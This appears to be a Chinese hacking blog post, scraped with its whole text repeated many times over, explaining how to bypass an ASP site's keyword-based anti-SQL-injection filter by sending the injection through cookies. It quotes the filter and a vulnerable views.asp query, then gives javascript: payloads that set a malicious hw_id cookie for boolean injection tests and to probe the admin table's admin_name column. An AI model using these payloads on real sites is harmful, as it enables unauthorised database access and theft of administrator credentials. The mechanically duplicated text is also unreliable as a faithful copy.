清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43071) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43070) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43069) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43068) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43067) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43066) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43065) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43064) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43063) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43062) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43061) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43060) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43059) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43058) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43057) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(43056) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
